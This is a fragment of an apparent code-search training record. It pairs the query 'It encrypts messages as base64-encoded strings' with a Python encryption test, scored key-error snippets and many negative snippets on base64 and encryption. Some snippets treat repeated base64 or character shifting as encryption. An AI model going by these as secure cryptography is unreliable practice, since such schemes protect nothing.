% key)\n\n return key", "def fail(self, key, **kwargs):\n return fail(self, key, **kwargs)", "def error(self, key, **kwargs):\n try:\n msg = self.error_messages[key]\n except KeyError:\n class_name = self.__class__.__name__\n raise AssertionError('Error with key={} is not found for class={}'.format(key, class_name))\n message_string = msg.format(**kwargs)\n raise ValidationError(message_string, code=key)", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def _transport_key_not_found():\n pecan.abort(404, u._('Not Found. Transport Key not found.'))", "def test_api_key_error(api):\n\twith pytest.raises(top_stories.APIKeyError):\n\t\tmissingAPI = top_stories.TopStoriesAPI()", "def test_PerfectModel_verify_comparison_keyerrors(\n perfectModelEnsemble_initialized_control, comparison\n):\n with pytest.raises(KeyError) as excinfo:\n perfectModelEnsemble_initialized_control.verify(\n comparison=comparison,\n metric=\"mse\",\n dim=[],\n )\n assert \"Specify comparison from\" in str(excinfo.value)", "def test_prediction_key_required(self):\n self._config['Prediction key'] = ''\n with self.assertRaisesRegex(ValueError,\n 'Please provide the prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def error(self, key, value, context, errorclass=InvalidDataError, **values):\n msg_template = self.message_for_key(key, context)\n raise errorclass(msg_template % values, value, key=key, context=context)", "def checkIndex(key):\n if not isinstance(key, (int, float)): raise TypeError\n if key<0: raise IndexError", "def test_unknown_api_key(self, app, data_queues, redis, metricsmock, logs):\n res = self._call(app, api_key=\"abcdefg\", ip=self.test_ip, status=400)\n self.check_response(data_queues, res, \"invalid_key\")\n metricsmock.assert_incr_once(\n self.metric_type + \".request\", tags=[self.metric_path, \"key:invalid\"]\n )\n assert redis.keys(\"apiuser:*\") == []\n assert logs.only_entry[\"api_key\"] == \"invalid\"\n assert logs.only_entry[\"invalid_api_key\"] == \"abcdefg\"", "def handle_key(self, k):\n\t\treturn False", "def test_is_valid_label_key_invalid_input():\n # test length violations\n assert not is_valid_label_key(key=None) # Too short\n assert not is_valid_label_key(key=\"\") # Too short\n assert not is_valid_label_key(key=f\"{'p' * 254}/n\") # prefix too long\n assert not is_valid_label_key(key=\"/n\") # prefix too short\n assert not is_valid_label_key(key=\"p/\") # name too short\n assert not is_valid_label_key(key=\"a\" * 254) # name too long\n assert not is_valid_label_key(key=f\"d/{'b'*64}\") # name too long\n # test first character violations (not alphanum)\n assert not is_valid_label_key(key=\"-a\")\n assert not is_valid_label_key(key=\".b\")\n assert not is_valid_label_key(key=\" c\")\n # test last character violations (not alphanum)\n assert not is_valid_label_key(key=\"a-\")\n assert not is_valid_label_key(key=\"b.\")\n assert not is_valid_label_key(key=\"c \")\n assert not is_valid_label_key(key=\"sw33T#\")\n # test middle characters violations\n assert not is_valid_label_key(key=\"a$$a\")\n assert not is_valid_label_key(key=\"b b\")", "def key_error_message(self,key):\n if not key:\n return 'key is blank.'\n elif any(map(lambda s: s in 
key,space_chars)):\n return '\"{}\" contains whitespace.'.format(key)\n elif any(map(lambda s: s in key,bad_chars)):\n return '\"{}\" contains special characters.'.format(key)", "def test_invalid_parameters(key, val):\n with pytest.raises(ParameterError):\n FastBasic(**{key: val}).read(\"1 2 3\\n4 5 6\")\n with pytest.raises(ParameterError):\n ascii.read(\"1 2 3\\n4 5 6\", format=\"fast_basic\", guess=False, **{key: val})", "def test_no_such_key():\n test = [{'key': 'val1'}, ['missing']]\n t_result = fetch_data_by_keys(*test)\n assert not is_successful(t_result)\n assert 'missing' in str(t_result.failure())", "def default(self, key):\n raise KeyError(repr(key))", "def test_failure_with_invalid_api_key(self):\n self.geocoder = Yandex(\n api_key='bad key'\n )\n with self.assertRaises(GeocoderInsufficientPrivileges):\n self.geocode_run(\n {\"query\": \"площадь Ленина Донецк\"},\n {}\n )", "def test_missing_mandatory(self):\n try:\n CollectorUpdate()\n self.assertFalse(\"RuntimeError expected\")\n except RuntimeError as exception:\n assert_that(str(exception), equal_to(\"Missing keys: 'stage', 'status', 'timestamp'\"))", "def test_no_key(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_authconfig(\n imageroller.test.get_config_parser(self._no_key))\n self.assertEqual(str(cm.exception), \"AuthConfig must contain ApiKey\")", "def test_other_user_kvs_get_failure(self):\r\n with self.assertRaises(AssertionError):\r\n self.kvs.get(self.other_key_factory(self.existing_field_name))", "def _validate_key(self, key):\n if isinstance(key, str):\n key = unicode(key, 'utf-8')\n elif not isinstance(key, unicode):\n raise TypeError(\n \"`key` must be `str` or `unicode`, not `{}`\".format(\n key.__class__.__name__)\n )\n return key", "def test__getitem__(self, in_, key, out_):\n if isinstance(out_, Exception):\n with pytest.raises(type(out_)) as excinfo:\n in_[key] # pylint: disable=W0104, pointless-statement\n assert excinfo.value.args[0] == out_.args[0]\n return\n assert in_[key] == out_", "def test_neg_exists_with_invalid_meta(self, key, record, policy, ex_code, ex_msg, put_data):\n put_data(self.as_connection, key, record)\n\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key, policy)\n\n # except e.ParamError as exception:\n # assert exception.code == ex_code\n # assert exception.msg == ex_msg", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Category']", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Category']", "def test_blank_key(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_authconfig(\n imageroller.test.get_config_parser(self._blank_key))\n self.assertEqual(str(cm.exception), \"AuthConfig must contain ApiKey\")", "def test_invalid_distribution_info_keys(self):\n\n invalid_distrib_info_keys = {\"bad_key\": \"\", \"badder_key\": True, \"worker_cost\": False}\n self.ocp_data[\"distribution_info\"] = invalid_distrib_info_keys\n self.assertEqual(self.ocp_data[\"distribution_info\"], invalid_distrib_info_keys)\n with tenant_context(self.tenant):\n serializer = CostModelSerializer(data=self.ocp_data, context=self.request_context)\n with self.assertRaises(serializers.ValidationError):\n serializer.is_valid(raise_exception=True)", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def 
test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def test_getitem_nokey(testchannel):\n key = testchannel.add(list)\n for i in range(5):\n testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def add_existing_key_fail(self, data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n return self.add_fail(data, message)", "def test_adding_config_keys():\n\n with pytest.raises(ValueError) as error:\n Config.config()[\"something_fake\"] = True\n\n assert \"something_fake is not a valid config key.\" in error.value.args", "def _check_transform_key(key: Hashable) -> None:\n _test_hashable = hash(key) # The only 'real' way to make sure is hashable\n # if not isinstance(key, Hashable):\n # raise TypeError((type(key), \"transformation lookup key is not hashable\"))", "def _check(self, key):\n if not self.contains(key):\n raise KeyError(\"ConfigManager does not contain key '%s'\" % key)", "def existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n self.add_fail(data, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n self.update_fail(data, message)\n assert self.verify_object(new_data)", "def _get(self, key: str):\n pass", "def _raiseIfWebsafeKeyNotValid(websafeKey, kind):\n # Check that websafeKey is not None\n if not websafeKey:\n raise endpoints.BadRequestException(\n \"Websafe key not provided for '%s'\" % kind)\n # Try to decode the websafe key into a real key\n try:\n key = ndb.Key(urlsafe=websafeKey)\n except:\n raise endpoints.BadRequestException(\n \"Websafe key provided for '%s' could not be decoded: %s\" %\n (kind, websafeKey))\n # Ensure that the key is of the desired kind\n if key.kind() != kind:\n raise endpoints.BadRequestException(\n \"Websafe key is not of the '%s' kind: %s\" % (kind, websafeKey))\n # If all is well, return the key\n return key", "def test_unset_key(self):\n context = {'help_key': 'unused-key'}\n self.assertRaises(\n ImproperlyConfigured,\n tags.madcap_flare_help,\n context)" ]
[ "0.7584052", "0.74336976", "0.7209498", "0.7197816", "0.71823823", "0.71537316", "0.70963115", "0.70610356", "0.7014894", "0.6917326", "0.6872797", "0.68682355", "0.6839676", "0.6820613", "0.6819844", "0.68171906", "0.68070513", "0.67946887", "0.67675406", "0.6766828", "0.6689345", "0.6685377", "0.6685339", "0.66765165", "0.66706324", "0.6660688", "0.66537595", "0.660068", "0.6589604", "0.65894747", "0.65646064", "0.6555247", "0.6545968", "0.65304375", "0.6527731", "0.65242934", "0.65242934", "0.6523482", "0.65109956", "0.64860195", "0.6484437", "0.64771384", "0.64715946", "0.6471414", "0.6471414", "0.64481884", "0.6446104", "0.64025974", "0.63836926", "0.63737154", "0.63675773", "0.6364753", "0.6363654", "0.6352129", "0.63467234", "0.6339463", "0.6337334", "0.63249034", "0.6309142", "0.6308538", "0.6302702", "0.6297178", "0.6294687", "0.62800276", "0.62693936", "0.62456393", "0.6241466", "0.6240813", "0.6235896", "0.6201875", "0.6197422", "0.61898214", "0.61795086", "0.6176109", "0.61718404", "0.6169958", "0.61650836", "0.61647063", "0.61641055", "0.6159244", "0.6149768", "0.61244255", "0.611399", "0.6112647", "0.61070794", "0.61043185", "0.61043185", "0.61023074", "0.609772", "0.6093386", "0.6093386", "0.60834545", "0.6074696", "0.6072588", "0.6072328", "0.6071305", "0.6064107", "0.60601485", "0.6050981", "0.60496646" ]
0.6123274
82
It gets its default key from settings.
def test_decrypt_key_default(self, settings):
    settings.CHITON_ENCRYPTION_KEY = b'0' * 32
    encrypted = encrypt('message')
    assert decrypt(encrypted) == 'message'
    settings.CHITON_ENCRYPTION_KEY = b'1' * 32
    with pytest.raises(EncryptionError):
        decrypt(encrypted)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def default(self, key):\r\n return self.inherited_settings[key.field_name]", "def get(self, key, default=None):\n return self.settings.get(key, default)", "def initial(self):\n from setman import settings\n return getattr(settings, self.name, self.default)", "def get_setting_default(cls, key, **kwargs):\n setting = cls.get_setting_definition(key, **kwargs)\n\n return setting.get('default', '')", "def get_setting(self, key, default=NOT_SET):\n if key in self.settings:\n return self.settings[key]\n app_key = 'tangled.app.' + key\n if app_key in self.settings:\n return self.settings[app_key]\n if default is NOT_SET:\n raise KeyError(\"'{}' not present in settings\".format(key))\n return default", "def get_setting_value(self, key, default = None):\n \n if not \"settings\" in self.configuration or not key in self.configuration['settings']:\n return default\n \n return self.configuration['settings'][key]", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def get(self, key, default=None):", "def get(self, key, default=None):\n pass", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return \"NewDinosaur\"\n return key", "def get(self, id, key, default=None):\n try:\n id_settings = self.id_dict[id]\n val = id_settings[key]\n except KeyError:\n try:\n val = self.default_settings[key]\n except KeyError:\n val = default\n return val", "def get(self, key, default):\n return self.plugin.get(key, default)", "def get(self, key, default=None):\n try:\n val = self._store.get(key)\n except KeyError:\n val = default\n if val is None and not default:\n return self._auto_prompt(key)\n return val", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return None\n return key", "def get(self, name, default=''):\n return getattr(settings, name, DEFAULT_SETTINGS.get(name, default))", "def getKey( self, key ):\n if key in self.conf:\n return self.conf[key]\n else:\n return None", "def get(self, key, default=None):\n if key in self:\n return self[key]\n return default", "def get(self, key, default=None):\n return self[key] if key in self else default", "def get(self, key, default=None):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"id\":\n return \"Id\"\n return key", "def get(self, key, default=None):\r\n try:\r\n return self[key]\r\n except KeyError:\r\n return default", "def get(self, key, default=None):\n raise NotImplementedError()", "def get(cls, key: EnumKeyType, default: EnumKeyType = None) -> str:\n try:\n return cls[key]\n except KeyError:\n return default", "def get_sublime(self, key, default=None):\n return self.sublime_settings.get(key, default)", "def get(key, default=None):\n config = _get_config_dict()\n return config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.context.get(self.prefix+'.'+key, default)\n except AttributeError:\n return default", "def get_setting(setting_name, default=None):\n settings_dict = getattr(settings, 'SIMPLE_FORUMS', None)\n\n if settings_dict:\n return settings_dict.get(setting_name, default)\n\n return default", "def get(self, key, default=None):\n return self.get_models().get(str(key), default)", "def default_value(self):\n return self.__class__.get_setting_default(self.key, **self.get_kwargs())", "def get(self, key, default=None):\n try:\n return 
self._get(key)\n except Exception:\n return default", "def get(self, key: str, default=None) -> Any:\n try:\n return self[key][0]\n except KeyError:\n return default", "def get_default(self):\n\n\t\treturn self.__default", "def get_option(self, key, default=None):\n current_profile = \"profiles.{}.{}\".format(self.get_profile(), key)\n global_profile = \"profiles.global.{}\".format(key)\n return self.__get_option__(current_profile, self.__get_option__(global_profile, default))", "def getDefault():", "def get_dictionary_default(path):\n if path in defaults_dict.keys():\n return defaults_dict[path]\n else:\n return ''", "def Default():\n return _DEFAULT", "def get(self, key, default=0):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key, default=''):\n key = self.optionxform(key)\n cached = self._cache.get(key, _use_default)\n if cached is not _use_default:\n return cached\n name_str = self.name\n key_str = to_unicode(key)\n settings = ProductSetting.select(self.env,\n where={'product': self.product,\n 'section': name_str,\n 'option': key_str})\n if len(settings) > 0:\n value = settings[0].value\n else:\n for parent in self.config.parents:\n value = parent[self.name].get(key, _use_default)\n if value is not _use_default:\n break\n else:\n if default is not _use_default:\n option = Option.registry.get((self.name, key))\n value = option.default if option else _use_default\n else:\n value = _use_default\n if value is _use_default:\n return default\n if not value:\n value = u''\n elif isinstance(value, basestring):\n value = to_unicode(value)\n self._cache[key] = value\n return value", "def get(self, keyname: str, default: Optional[Any] = None) -> Any:\n try:\n return self[keyname]\n except KeyError:\n return default", "def default(self, key):\n raise KeyError(repr(key))", "def getSetting(self,section,key,default=None):\n section,key = map(bolt.LString,(section,key))\n settings = self.getSettings()\n if section in settings:\n return settings[section].get(key,default)\n else:\n return default", "def setting(name, default=None):\n return getattr(settings, name, default)", "def _get_simple_default_value(simple):\n return _SIMPLE_DEFAULT_VALUES[simple]", "def get(self, key):\n try:\n if key == key.upper():\n return self.config[key]\n return self.options[key]\n except KeyError:\n return None", "def default_value(self, key: str) -> Any:\n return _ba.get_appconfig_default_value(key)", "def get(self, key, default=None):\n return self._d.get(key, default)", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return 
pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def getKey(kwargs,key,default=None):\n value = kwarg.get(key,default)\n if value==None:\n return default\n return value", "def setdefault(self, key):\n pass", "def get_default(name, value):\n return os.environ.get('EXAMPLE_{}'.format(name.upper()), value)", "def default(self):\n return self.get(name='Unknown')", "def default():\n return DefaultSwh.default()", "def get(self, key, default_val=None):\n if key not in self._config.keys(): # we don't want KeyError\n return default_val # just return None if not found\n return self._config[key]", "def get_setting_definition(cls, key, **kwargs):\n settings = kwargs.get('settings', cls.SETTINGS)\n\n key = str(key).strip().upper()\n\n if settings is not None and key in settings:\n return settings[key]\n else:\n return {}", "def get(self, key: str, default: Any = None) -> Any:\n try:\n return getattr(self, key)\n except AttributeError:\n return default", "def get(self, key: str, default: Optional[Any] = None) -> Any:\n raise NotImplementedError", "def get(self, key: str, default: Union[str, T] = '') -> Union[str, T]:\n key = key.casefold()\n for k in self._keys:\n if k.casefold() == key:\n return self._keys[k]\n else:\n return default", "def opt(self, key, default=False):\n if key not in self.options:\n return default\n return self.options.get(key)", "def get(self, name):\n try:\n return self._defaults[name]\n except KeyError:\n raise UndefinedDefault(\"default %s is undefined\" % name)", "def setdefault_key_value(self):\n raise NotImplementedError", "def get_global(self, key, default=None, as_tuple=False):\n if as_tuple:\n return (self.get_global(key, default, as_tuple=False), True)\n else:\n return self.settings.get(key, default)", "def get(self, key, default=None):\n result = self._get_raw_input().get(key, default)\n return result[0] if isinstance(result, list) else result", "def GetSetting(appname, section, key, default=None):\n settings = _OptionsDB(appname)\n try:\n return settings[section, key]\n except config.configparser.Error:\n if default is not None:\n return default\n raise", "def TeXKey(self, default=None):\n return self.data.get('texkey', default)", "def load_key():", "def setdefault(self, key: str, default: Any = None) -> Any:\n try:\n return self[key]\n except KeyError:\n self[key] = default\n return self[key]", "def get(self, metakey, default=None):\n if metakey in self:\n return self[metakey]\n return default", "def get_default_access_key_id():\n access_key_id_script = AWS_ACCOUNTS['default'].ACCESS_KEY_ID_SCRIPT.get()\n return access_key_id_script or get_s3a_access_key()", "def getcfg(self, key, 
default=None):\n return self._config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.__getitem__(key)\n except ValueError:\n if default is not None:\n return default\n else:\n raise", "def get(self, key, default=None):\n return self.metadata_dict.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get_from_environ(key: str, default: Any = None) -> str:\n return os.environ.get(key, default)" ]
[ "0.7820905", "0.76434904", "0.7315344", "0.7273974", "0.7266542", "0.7164663", "0.708993", "0.7069916", "0.7067126", "0.70258087", "0.70121825", "0.69252306", "0.686531", "0.6851818", "0.6849022", "0.6843253", "0.678574", "0.6693812", "0.66881984", "0.664332", "0.6612321", "0.6610823", "0.6604265", "0.65919226", "0.65308213", "0.6520606", "0.65183884", "0.65071595", "0.6506874", "0.6498181", "0.6491904", "0.6483908", "0.64564943", "0.6451418", "0.6442761", "0.64354736", "0.64316875", "0.6429961", "0.64269054", "0.6421008", "0.6418649", "0.64052576", "0.64047796", "0.639343", "0.63873017", "0.63833815", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.6350485", "0.63468194", "0.63334274", "0.63232225", "0.63205796", "0.63046205", "0.6303444", "0.6299824", "0.6281038", "0.6248287", "0.6246647", "0.6237095", "0.62338537", "0.6232617", "0.619575", "0.61891294", "0.6182222", "0.61795634", "0.6178773", "0.61645335", "0.6162935", "0.61598754", "0.61508507", "0.6146326", "0.61368436", "0.61368436", "0.6136821" ]
0.0
-1
It encrypts messages as base64-encoded strings.
def test_encrypt_encoding(self):
    encrypted = encrypt('message')
    assert encrypted
    assert encrypted != 'message'
    assert type(encrypted) == str
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encrypted(data: str) -> str:\n return b64encode(data.encode('ascii')).decode('ascii')", "def encrypt(strings):\r\n rd = ''.join(random.sample(upperchr+lowcarsechr+otherchr+numchr,10))\r\n output = base64.encodestring(strings+mselment+rd)\r\n print output", "def test_encryption_of_string(cipher):\n iv = Random.new().read(AES.block_size)\n encrypted = cipher.encrypt(message)\n assert base64.b64encode(base64.b64decode(encrypted)) == encrypted", "def encrypt_message(self, message: dict) -> None:\n secure_message = {'type': 'SECURE_MESSAGE', 'content': None}\n content = json.dumps(message).encode()\n \n ct = self.crypto.encrypt(content)\n secure_message['content'] = base64.b64encode(ct).decode()\n self.encrypted_data += secure_message['content']\n\n return secure_message", "def encode(msg: str) -> str:\n\n msg_bytes = msg.encode(\"ascii\")\n b64_bytes = base64.b64encode(msg_bytes)\n return b64_bytes.decode(\"ascii\")", "def base64_encode(data):\n return base64.encodestring(data);", "def encrypt_and_encode(data, key):\r\n return base64.urlsafe_b64encode(aes_encrypt(data, key))", "def encryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n encoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code+key\n new = chr(change)\n string += new\n key += key_increment\n \n encoded = ''.join(string)\n return ('Encoded Message:\\t' + encoded)", "def base64url_rsa_encrypt(self, value, public_key):\n rsakey = RSA.importKey(public_key)\n cipher = PKCS1_OAEP.new(rsakey)\n\n # encrypt, IMPORTANT: read about padding modes (RSA.pkcs1_padding)\n encrypted_msg = cipher.encrypt(value)\n\n if encrypted_msg:\n b64 = encrypted_msg.encode('base64')\n b64 = re.sub('(/)', '_', b64)\n b64 = re.sub('(\\+)', '-', b64)\n b64 = re.sub('(=)', '.', b64)\n return b64\n else:\n return AlignetError('RSA Ciphering could not be executed')", "def _encode_encrypted_part(self, value):\n\n return encoding_utils.bytes_to_base64(value)", "def encrypt(self, data):\n\n key_public = RsaPublicKey.Read(self.crypt_public)\n return b64encode(key_public.Encrypt(data))", "def encrypt(cleartext):\n base_encode = {'16': base64.b16encode,\n '32': base64.b32encode, '64': base64.b64encode}\n ciphertext = cleartext+''\n\n for i in range(encrypt_times):\n base = random.choice(['16', '32', '64'])\n ciphertext = base_encode[base](ciphertext)\n\n return ciphertext", "def _encode_base64(data: str) -> str:\n ebytes = base64.b64encode(data.encode(\"utf-8\"))\n estring = str(ebytes, \"utf-8\")\n return estring", "def b64enc(data: bytes) -> str:\n\n return base64.standard_b64encode(data).decode(\"utf-8\")", "def base64url_encode(msg):\n encoded_input = base64.urlsafe_b64encode(to_bytes(msg))\n stripped_input = to_bytes(to_string(encoded_input).replace('=', ''))\n return stripped_input", "def encrypt():\n request_data = request.get_json()\n\n if 'message' in request_data:\n encryption = Encryption()\n try:\n data = encryption.encrypt(request_data['message'])\n except ValueError as error:\n return Response(\n json.dumps(\n {\n 'error': f'Failed to encrypt the message due to the error: [{error}]'\n }\n ),\n 400,\n mimetype='application/json'\n )\n\n for key in data:\n data[key] = b64encode(data[key]).decode()\n\n return jsonify(data), 200\n\n return Response(\n json.dumps({'error': 'Message missing in the request body'}),\n 400,\n mimetype='application/json'\n )", "def encrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.encrypt(message.encode())", "def 
encrypt_message(message,public_key,symetric_key):\n\tif message != None:\n\t\tnonce = os.urandom(12)\n\t\tmessage = AESCCM(symetric_key).encrypt(nonce,message.encode(\"iso-8859-1\"),None)\n\t\tnonce, *_ = encrypt(public_key,nonce)\n\t\tmessage ={'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\n\treturn message", "def encrypt(self, message):\n\n IV = Random.new().read(self.BLOCK_SIZE)\n aes = AES.new(self.key, AES.MODE_CBC, IV)\n return base64.b64encode(IV + aes.encrypt(self._pad(message)))", "def encrypt(self, message: bytearray) -> bytearray:\n return self.__PRGA(message)", "def doEncode(self):\n raise CipherError(\"override this func and return the encoded msg\")", "def Encrypt(self, data):\n\n if len(data) % 16 != 0:\n data += ' ' * (16 - len(data) % 16)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n data = es.encrypt(data)\n data = base64.b64encode(data)\n return data", "def my_base64encode(s):\n return base64.b64encode(s).decode(\"utf-8\")", "def strEnc(data, *keys):\n r = len(data) % 4\n data += (4 - r if r else 0) * chr(0)\n encData = \"\"\n for i in range(len(data) // 4):\n tempBt = strToBt(data[i * 4: i * 4 + 4])\n for key in keys:\n for b in getKeyBytes(key):\n tempBt = enc(tempBt, b)\n encData += bt64ToHex(tempBt)\n return encData", "def _b64_encode(data):\n enc = base64.b64encode(data)\n return enc.translate(B64_TO_BCRYPT, '=')", "def encode_data ( data ) :\n firstpass = base64.b64encode( data )\n cipher = get_cipher( firstpass )\n\n index = 0\n datalen = len( firstpass )\n encoded_data = []\n while index < datalen :\n if index % 2 == 0 :\n encoded_data.append( chr( ord( firstpass[ index ] ) + cipher ) )\n else :\n encoded_data.append( chr( ord( firstpass[ index ] ) - cipher ) )\n index += 1\n\n encoded_data[ 0 ] = firstpass[ 0 ]\n encoded_data[ -1 ] = firstpass[ -1 ]\n encoded_data[ -2 ] = firstpass[ -2 ]\n return ''.join( encoded_data )", "def encrypt(self, raw, use_base64=True, pad=True):\n encryptor = self.cipher.encryptor()\n if pad:\n raw = self._pad(raw)\n crypted_text = encryptor.update(raw) + encryptor.finalize()\n return base64.b64encode(crypted_text) if use_base64 else crypted_text", "def encryptstring(text, password):\n\n enc = []\n for i in enumerate(text):\n key_c = password[i[0] % len(password)]\n enc_c = chr((ord(i[1]) + ord(key_c)) % 256)\n enc.append(enc_c)\n return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()", "def encryptB64(self, key, value):\n return base64.b64encode(self.encrypt(key, value))", "def encode(self, data):\n return self.__cipher.encrypt(data.encode('utf-8'))", "def encrypt(self, message):\n\n message = self._pad(message)\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return base64.b64encode(iv + cipher.encrypt(message)).decode('utf-8')", "def base64Encode(input, addNewlines = False):\n base64Str = base64.b64encode(input)\n if not type(base64Str) is str:\n base64Str = \"\".join(map(chr, base64Str))\n \n if not addNewlines:\n return base64Str\n\n result = \"\"\n i = 0\n while i < len(base64Str):\n result += base64Str[i:i + 64] + \"\\n\"\n i += 64\n return result", "def base64_encode(text):\n if not isinstance(text, (bytes, bytearray)):\n text = bytes(text.encode())\n encode = base64.b64encode(text)\n return encode.decode('ascii')", "def craft(b64_msg, nkey=key):\n byte_msg = base64.b64decode(b64_msg)\n pad = 8-(len(byte_msg)%8)\n byte_msg += b\"\\x00\"*pad\n enc_msg = encrypt_faces(byte_msg)\n hm = craft_hmac(enc_msg)\n payload = 
enc_msg+hm\n return base64.b64encode(payload).decode()", "def encrypt(self, s):\n public_key = serialization.load_pem_public_key(\n self.key.encode('utf-8'),\n backend=default_backend())\n\n encrypted = public_key.encrypt(\n s.encode('utf-8'),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None))\n # enc = bytes(encrypted).decode(\"utf-8\")\n return str(encrypted)", "def encrypt(self, buffer):\n cipher = AES.new(self.psk, AES.MODE_GCM, FIXED_IV)\n ct_bytes = cipher.encrypt(pad(buffer, AES.block_size))\n return base64.b64encode(ct_bytes)", "def base64_string(self) -> global___Expression:", "def base64encode(self, value):\n\n return value.encode(\"base64\")[:-1].replace(\"\\n\", \"\")", "def encrypt_string(self, raw_string):\n return self.fernet_instance.encrypt(raw_string.encode('utf-8'))", "def enc(self, data):\n return data", "def encrypt(self, msg, fingerprint):\n\n if type(msg) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n if type(fingerprint) != type('') or len(fingerprint) != 40:\n raise ValueError(\"invalid fingerprint!\")\n\n return self.gpg.encrypt(msg, fingerprint).data", "def encrypt_data(self, params):\n from django.core.signing import dumps\n return dumps(params, salt=self.salt_namespace)", "def __encrypt(self, plaintext):\n iv = get_random_bytes(16)\n try:\n encryption_envelope = {'ciphertext':'', \n 'keyid':esn_manifest + '_' + str(self.sequence_number), 'sha256':'AA==', \n 'iv':base64.standard_b64encode(iv).decode('utf-8')}\n except Exception:\n print('ESN is invalid.')\n sys.exit(0)\n\n plaintext = Padding.pad(plaintext.encode('utf-8'), 16)\n cipher = AES.new(self.encryption_key, AES.MODE_CBC, iv)\n ciphertext = cipher.encrypt(plaintext)\n encryption_envelope['ciphertext'] = base64.standard_b64encode(ciphertext).decode('utf-8')\n return json.dumps(encryption_envelope)", "def encrypt_byte_list_in_str(bytearray_list, public_encryption_key_obj):\n encrypted_str_list = []\n for bytearray_str in bytearray_list:\n message_text_enc = public_encryption_key_obj.encrypt(str(bytearray_str.decode(\"utf-8\")), 16)[0]\n encrypted_str_list.append(message_text_enc)\n encrypted_message_str = \"\".join(encrypted_str_list)\n return encrypted_message_str", 